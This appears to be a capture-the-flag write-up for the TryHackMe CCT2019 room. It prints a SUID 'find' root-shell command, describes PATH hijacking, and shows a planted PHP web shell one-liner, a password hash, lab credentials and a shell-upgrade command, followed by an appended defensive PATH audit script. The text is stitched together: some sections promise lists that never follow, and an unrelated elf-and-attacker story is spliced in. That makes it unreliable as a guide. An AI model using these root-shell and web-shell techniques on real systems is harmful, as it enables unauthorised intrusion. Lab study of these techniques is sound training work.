TryHackMe CCT2019

In the world of cybersecurity, theory can only take you so far. To truly understand how attacks work—and more importantly, how to defend against them—you need hands-on experience. This is where platforms like TryHackMe shine, offering gamified, real-world network environments for students and professionals alike.

One room that consistently challenges and educates users is the TryHackMe CCT2019 room. Named after the Circle City Con 2019 (a prominent Indianapolis-based hacker conference), this room is a CTF (Capture The Flag) style challenge that tests a wide range of skills: from reconnaissance and web exploitation to privilege escalation and password cracking.

If you are looking to move beyond "easy" boxes and into intermediate/advanced territory, TryHackMe CCT2019 is your next milestone. This article will break down everything you need to know: the objectives, the step-by-step methodology, the tools required, and the key takeaways.


This track was designed for those who had just started their journey. It focused on fundamental skills essential for any security analyst or penetration tester:

For those interested in the investigative side of security, CCT2019 offered a solid Forensics track. This wasn't about hacking into machines, but rather understanding what happened after an incident.

This is the core challenge of TryHackMe CCT2019. You have a shell, but you can't read root.txt. Here is the typical escalation vector:

Step A: Find SUID Binaries. Run:

find / -perm -4000 2>/dev/null

Look for unusual binaries that aren't standard (e.g., /usr/bin/zip, /usr/bin/find, or a custom binary).

Step B: GTFOBins to the Rescue. If you see /usr/bin/find, check GTFOBins. The find command with SUID allows you to execute commands as root.

/usr/bin/find . -exec /bin/sh \; -quit

This spawns a root shell.

Alternative Vector (Path Hijacking): Sometimes the room uses a custom script that calls a system command without an absolute path (e.g., service apache2 restart instead of /usr/sbin/service). If you can write to a directory earlier in $PATH, you can create a malicious binary named service that spawns a shell.
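A defender-side check for the path-hijacking condition described above, as an added example that is not part of the original write-up: it walks a PATH string in the order the shell searches it and reports writable or relative entries that come before the directory that really provides the command. The function name `path_hijack_check` and its output labels are assumptions made for this example.

```shell
#!/bin/sh
# Added example (not from the room): audit a PATH string for the hijack
# condition described above. All names here are hypothetical.

# path_hijack_check CMD PATH_STRING
# Prints one finding per line for every PATH entry searched *before* the
# directory that provides CMD, if that entry is writable by the current
# user or is relative (an empty entry or "." means the caller's cwd).
# Returns 0 if clean, 1 if any finding was printed, 2 if CMD is not found.
path_hijack_check() {
    cmd=$1
    rest="$2:"            # trailing ':' so the loop also sees the last entry
    findings=0
    while [ -n "$rest" ]; do
        dir=${rest%%:*}   # first remaining entry
        rest=${rest#*:}   # everything after it
        case $dir in
            ''|.)
                echo "RELATIVE: '$dir' resolves to the caller's cwd"
                findings=1
                continue ;;
        esac
        if [ -f "$dir/$cmd" ] && [ -x "$dir/$cmd" ]; then
            # An unqualified call to CMD resolves here; later entries
            # are never searched, so the audit stops.
            echo "RESOLVES: $dir/$cmd"
            return "$findings"
        fi
        if [ -d "$dir" ] && [ -w "$dir" ]; then
            echo "WRITABLE: $dir precedes the real $cmd"
            findings=1
        fi
    done
    echo "NOTFOUND: $cmd"
    return 2
}

# Audit the current environment for the command used in the text above.
path_hijack_check service "$PATH" || true
```

Run it as the account that executes the privileged script, with that script's effective PATH; any WRITABLE or RELATIVE line is a reason to switch the script to absolute paths or tighten the directory's permissions.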

Further enumeration of the web server (or using tools like wfuzz or gobuster with larger wordlists) uncovers a file: /development/hash.txt.

Contents of hash.txt:

5966b3aed20b485fea9b33c6721f4150
  • First flag located in /root/flag1.txt.
  • Using elf:workshop2019, you log into SSH. You’re now on the system as a low-privileged elf. But the attacker wasn’t here yet—they used the same credentials to upload a malicious PHP script via the inventory portal’s file upload feature.

    You find the script in /var/www/html/uploads/shell.php. It’s a simple web shell:
    <?php system($_GET['cmd']); ?>

    This is how the attacker first executed commands as www-data.

    To succeed in this room, you should be comfortable with:

    | Tool | Purpose |
    | :--- | :--- |
    | Nmap | Port scanning & service detection. |
    | Gobuster / Dirb | Web directory brute-forcing. |
    | Burp Suite / Curl | Intercepting/modifying web requests for SQLi or Command Inj. |
    | Netcat (nc) | Reverse shell listener. |
    | Python/Perl | Upgrading to a TTY shell (python3 -c 'import pty;pty.spawn("/bin/bash")'). |
    | LinPEAS / LinEnum | Automated privilege escalation script (optional, but helpful). |
    | John the Ripper | Cracking database password hashes. |
    | GTFOBins | Web reference for SUID exploitation. |